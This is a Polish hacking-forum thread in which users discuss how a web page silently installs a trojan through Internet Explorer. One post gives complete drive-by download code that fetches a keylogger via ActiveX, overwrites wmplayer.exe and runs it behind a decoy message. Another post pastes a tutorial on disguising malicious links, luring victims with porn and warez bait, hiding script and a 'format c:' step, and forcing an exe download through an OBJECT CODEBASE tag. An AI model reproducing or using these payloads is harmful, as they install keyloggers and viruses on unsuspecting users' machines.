Pokaż wyniki 1 do 9 z 9

Temat: Iexplore

  1. #1
    Avatar Michal_sh
    Michal_sh jest offline (s)aint
    Zarejestrowany
    Apr 2007
    Postów
    688

    Domyślnie Iexplore

    Jakiś rok temu moze 2 dostałem link na gg z adresem do stronki która zainstalowała na moim PC trojana , i jestem ciekaw jak oni zrobili tą stronkę ze po wejściu ( internet explolerem oczywiście) na kompie instaluje się trojan albo odpala jakikolwiek inny plik wykonywalny *.exe . Może ktoś z was wie .....

  2. #2
    Zarejestrowany
    Dec 2006
    Postów
    726

    Domyślnie

    Żeby było możliwe dokonanie czegoś takiego to trzeba znaleźć jakąś luke w przeglądarce.
    "dobrzy hakerzy są sławni na cały świat, ale o hakerach geniuszach nikt nic nie wie."

  3. #3
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Witam

    Są tez trojany kórych nie trzeba uruchamiac wystarczy ze sie zapisze na dysk, i juz robi to co trzeba, luke w przeglądarce trzeba znalesc napewno zgadzam sie z przedmówcą PS: Kiedyś mialem cos takiego wymyslalo sie adres stronki i mozna bylo zucic tam trojana on tam zajmowal 1 dziesiątą KB:P Podczas otwierania stron sa przesylane malutkie pliki cookies trojanka sie wpychalo miedzy te pliczki i zapisywal sie na dysk tak samo jak cokies, a tak jak napisalem wczesniej nie musisz go otwierac wystarczy ze zostanie zapisany na dysk czy jakos tak to bylo :PP

    PS: Jak znajde tego linka napewno wzuce


    pozdrawiam

  4. #4
    Avatar Michal_sh
    Michal_sh jest offline (s)aint
    Zarejestrowany
    Apr 2007
    Postów
    688

    Domyślnie

    ok napewno sie przyda , a co powiecie na to :

    <HTML>
    <textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "ADRES KEYLOGGERA",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

    </textarea>
    TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...]
    <script language="javascript">

    function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {

    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");

    if (line != '') {
    result += line + '\\r\\n';
    }
    }
    return result;
    }

    function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media");
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);

    </script>
    <script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; }
    setTimeout('go()',10000); </script>
    </HTML>

  5. #5
    Avatar Michal_sh
    Michal_sh jest offline (s)aint
    Zarejestrowany
    Apr 2007
    Postów
    688

    Domyślnie

    Cytat Napisał eryk Zobacz post
    Witam

    Są tez trojany kórych nie trzeba uruchamiac wystarczy ze sie zapisze na dysk, i juz robi to co trzeba, luke w przeglądarce trzeba znalesc napewno zgadzam sie z przedmówcą PS: Kiedyś mialem cos takiego wymyslalo sie adres stronki i mozna bylo zucic tam trojana on tam zajmowal 1 dziesiątą KB:P Podczas otwierania stron sa przesylane malutkie pliki cookies trojanka sie wpychalo miedzy te pliczki i zapisywal sie na dysk tak samo jak cokies, a tak jak napisalem wczesniej nie musisz go otwierac wystarczy ze zostanie zapisany na dysk czy jakos tak to bylo :PP

    PS: Jak znajde tego linka napewno wzuce


    pozdrawiam
    oooo przydało by się jak sie sam odpala po tym jak znajdzie sie na dysku ofiary ... skąd wie że ja nie jestem ofiarą hehe przeceż ktoś musi go wysłać, stworzyć itp

  6. #6
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    poszukaj dobrze na forum Sardihan też podawał jeden ze sposobów...

    PS. zapisałem sobie ten kod w pliczku txt na pulpicie z myślą ze potem przejże a tu nagle świński ogłosić w słuchawkach mało zawału nie dostałem - momentalnie odechciał mi się spać - kasperski wykrył nawet po kodzie ze ten plik mi "zagraża" - (TQM też już o tym pisał - a dziś przekonałem się na własnej skórze
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  7. #7
    Avatar Michal_sh
    Michal_sh jest offline (s)aint
    Zarejestrowany
    Apr 2007
    Postów
    688

    Domyślnie

    Oj chyba kaspersky mnie nie lubi


    BTW przestudiowałem dużą część forum nie moge tego znaleźć ;/
    Ostatnio edytowane przez Michal_sh : 05-07-2007 - 10:39 Powód: musił bym towrzyć nowy post

  8. #8
    Zarejestrowany
    Apr 2007
    Postów
    5

    Domyślnie

    Znalazłem cos kiedyś na temat luk w IE, i skopiowałem to na dysk, a że to było dość dawno temu to adresu nie pamietam. Skopiuje to wam tu, może sie komuś przyda.


    Kod:
    o PAMIĘTAJ, ŻE NIE POWINIENEŚ                                             o
    O I NIE MOŻESZ STOSOWAĆ WIEDZY ZDOBYTEJ Z TEGO TEKSTU W SPOSÓB            O
    o NIELEGALNY!!!!                                                          oo Ten tekst można rozpowszechniać tylko w formie oryginalnego pliku txt   o
    O NIE MASZ PRAWA USUWANIA I MODYFIKOWANIA INFORMACJI DOTYCZĄCYCH          O
    o KWESTII AUTORSTWA TEGO TEKSTU!!!!!!!!!!!!!!!!!!!!!!!                    o
    OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
    
    h4x0r0w4n13 M$ IE :D
    
    Ten dokument uświadomi ci jak wiele można zdziałać z IE :)
     Sorki ,że ten tekst taki krótki, ale trzeba zwięźle;D
    
    Tekst autorstwa xenu
    
    
    
    I.     Ukrywanie linku
      1.1   "Małkpa"
      1.2   TinyURL
      1.3   Fałszywe obrazki
      1.4   Zachęcenie do wejścia/kliknięcia
    
    II.     Dziury i furtki w IE
      2.1    JScript Ghost Bug
      2.2    Otwieranie plików exe
    
    III.    Jak się zabezpieczyć?   
    IV.     Mowa końcowa
    V.      Super Bonus!!!
    
    
    
    
    
    
    
    
    
     
    
    
    
    
    
    
    
    
    ===========================================================================
    I. Ukrywanie linku
    ===========================================================================
    
    
    Jak wiadomo w dzisiejszych czasach **prawie** nikt nie klika w podejrzane
    linki, a do takich NIE NALEŻĄ pliki graficzne oraz zaufane strony takie jak
    google.com, onet.pl, pl.wikipedia.org itp. O dziwo, wiele ludzi, a 
    zwłaszcza młodych klika w linki ukryte przy użyciu serwisu TinyURL.com
    W tym rozdziale dokładnie opiszę ukrywanie linków.
    
    
    
    
    ***************************************************************************
    1.1. "Małpka"
    ***************************************************************************
    
    Jak już napisałem, ludzie z chęcią klikają na linki prowadzące do zaufanych
    i bardzo popularnych stron jakimi są google.com czy pl.wikipedia.org. Na
    pewno nie umieścisz plików na serwerach tych sajtów, ale przecież można
    "podrobić" linki przy użyciu bardzo starego tricku z małpką, a dokładniej,
    ze znaku "@".
    
    +[Przykład]------------------------------------------------------------+
    |<A HREF="[email protected]>Google</A> |
    +----------------------------------------------------------------------+
    
    Jak zapewne zauważyłeś, po kliknięciu na link wejdziesz na stronę 
    poświęconą dzieciom neostrady (trollom). O co w tym wszystkim chodzi?
    Nie wiem ;D 
    Oczywiście żartowałem. kiedy podajesz do przeglądarki adres
    "[email protected]" próbuje ona zalogować się przy użyciu identyfikatora 
    "xxx" a skoro witryna nie wymaga logowania, wchodzimy na nią jak 
    gdyby nigdy nic. Bardzo ważną sprawą jest długość "loginu" -
    - im dłuższy tym lepiej. Osobiście uważam ,że na tą metodę można nabrać
    nawet zaawansowanych użytkowników komputera. 
    Pamiętaj ,że FireFox wyświetli komunikat o niebezpieczeństwie. To chyba
    jest jedyna wada tego sposobu.
    
    
    
    
    ***************************************************************************
    1.2. TinyURL
    ***************************************************************************
    
    Bardzo wielu młodych ludzi żądnych pornoli i warezu, często musi
    klikać w linki skrócone przy użyciu serwisu TinyURL.com lub Tiny.pl.
    Wystarczy wejść na jeden z podanych wyżej adresów i wstukać adres strony
    z wirusem czy innym niebezpieczeństwem i skopiować wygenerowany link.
    
    +[Przykład]------------------------------------------------------------+
    |<A HREF="http://tinyurl.com/3dxhx3">Warez i hard-core porno</A>       |
    +----------------------------------------------------------------------+
    
    Po kliknięciu ofiara przechodzi na stronę o dzieciach neostrady. Działa
    i tyle :)
    
    
    
    
    ***************************************************************************
    1.3. Fałszywy obrazek
    ***************************************************************************
    
    Młodzi ludzie żądni zdjęć porno z udziałem posła Andrzeja Leppera <lol2>
    klikną w każdy link z obrazkiem, który będzie stosownie opisany.
    Ale kto powiedział, że w pliku *.JPEG musi być obrazek?
    Przecież może się tam znajdować złośliwy kod html czy nawet php lub
    XSSI :)
    Jeżeli używasz serwera Apache jest to dziecinnie proste. W ustawieniach
    serwera (ew. w cPanelu) zmień MIME plików *.JPG lub dowolnych innych
    na "text/html". Proste? Ja myślę :)
    Ta metoda jest doskonała, jeszcze żadna przeglądarka nie ma zabezpieczeń
    przeciwko niej.
    
    
    
    
    ***************************************************************************
    1.4. Zachęcenie do wejścia/kliknięcia
    ***************************************************************************
    
    Najlepiej opublikować link w jakimś warezie lub innym forum. Hiperłącze
    należy jakoś stosownie podpisać. Należy pamiętać, że jeśli link jest ukryty
    "małpką" należy zatytuować stosownie. To znaczy, że jak jest 
    "[email protected]" to należy napisać,
    że to wikipedia. 
    Jeżeli jednak ukrywamy linka przy użyciu TinyURL to polecam podpisywanie 
    jako "Raven Riley Movies" lub coś w tym stylu :-) 
    Natomiast JPG - sam zgadnij ;D
    
    
    
    
    
    
    ===========================================================================
    II. Dziury i furtki w IE
    ===========================================================================
    
    To co tygryski lubią najbardziej :D Nie zamieszczam tu jakiś archaizmów
    jak to nie którzy autorzy faq'ów mają w zwyczaju^^
    
    
    
    
    ***************************************************************************
    2.1. JScript Ghost bug
    ***************************************************************************
    
    Bardzo ciekawy bug w IE (słyszałem, ale nie sprawdzałem ,że też w 
    niektórych wersjach przeglądarki Opera), 
    średnio przydatny (w skali 1 do 10: 6).
    
    +-[Przykład]-------------------------------------------------------------+
    | <script type="text/jscript">                      // Ten kod           |
    | function duszek() {                              //  jest              |
    | document.write("zonk? hehe lol!");              //   konieczny         |
    | }                                              //    i                 |
    | window.onload = duszek;                       //     tyle              |
    | </script>                                                              |
    +------------------------------------------------------------------------+
    
    Uruchom powyższy kod w Internet Explorerze. No i? Wyświetlił się napis
    "zonk? hehe lol!". Tego za pewne się spodziewałeś :) 
    Ale wejdź w:
    ||Widok --> Źródło
    zonk? Nie widać ,że to JScript :) Jak to wykorzystać?
    Najprostrzą metodą jest wstawienie 
    ||alert("Ogólny błąd programu Internet Explorer")
    User spojrzy w źródło i nie zauważy niczego dziwnego i pomyśli ,że coś
    jest z browserem i dokona, jakże cudownego ^_^
    || format c:
    Możecie mi nie wieżyć, ale ja to sprawdziłem i doszło do formata! 
    Oczywiście można to wykorzystać w bardziej wyrafinowany sposób,
    ale nie o to chodzi.
    
    PS. Ten kod ukrywa wszelkie inne kody :>
    
    
    
    
    ***************************************************************************
    2.2. Otwieranie plików exe
    ***************************************************************************
    
    To chyba nie jest błąd, a idiotyczny ficzer. Przydatność 10/10. Dzięki temu
    można odpalić dowolnego exe'ca przez przeglądarkę, więc władowanie wirusa 
    nie jest problemem ;] 
    
    +-[Przykład]-------------------------------------------------------------+
    |<object width=0 height=0 CODEBASE="http://www.fu.org/zonkowatywirus.exe"|
    |classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1>  |
    |</object>                                                               |
    +------------------------------------------------------------------------+
    
    W miejscu "CODEBASE=" trzeba oczywiście wpisać adres swojego wirusa. 
    Obecnym czasem rozmiar wirusa nie ma żadnego znaczenienia, w końcu to doba
    stałych i szybkich łącz. Nie trzeba więc pisać swojego super hiper über
    wirusa w jakimś tam noobowskim assemblerze1 ^_^.
    || Assembler - to dobre dla noobów1
    Niestety (a raczej stety, nie trzeba uważać na strony na jakie się wchodzi)
    to działa tylko na Internet Explorerze.
    
    
    
    
    
    
    ===========================================================================
    3. Jak się zabezpieczyć
    ===========================================================================
    
    Po pierwsze - nie używać Internet SrajPolera. 
    Po drugie - nie klikaj w linki prowadzące do obrazków - możesz je co 
    najwyżej ściągnąć!
    Po trzecie - Wyłącz obsługę JavaScript i (jeśli naprawdę musisz używać
    IE) ActiveX'a
    
    Te trzy regułki zna chyba każdy, ale musiałem to napisać :)
    
    
    
    
    
    
    ===========================================================================
    4. Mowa końcowa
    ===========================================================================
    
    Po przeczytaniu tego tekstu możesz uważać, że jesteś pr0 (o ile jesteś
    SK lub DN). Oczywiście to nie prawda. PAMIĘTAJ, ŻE NIE POWINIENEŚ
    I NIE MOŻESZ STOSOWAĆ WIEDZY ZDOBYTEJ Z TEGO TEKSTU W SPOSÓB NIELEGALNY!!!!
    Mam nadzieję, że zobaczyłeś tu coś nowego. Dziękuje za uwagę.
    Autorem tekstu jest xenu ;]

  9. #9
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj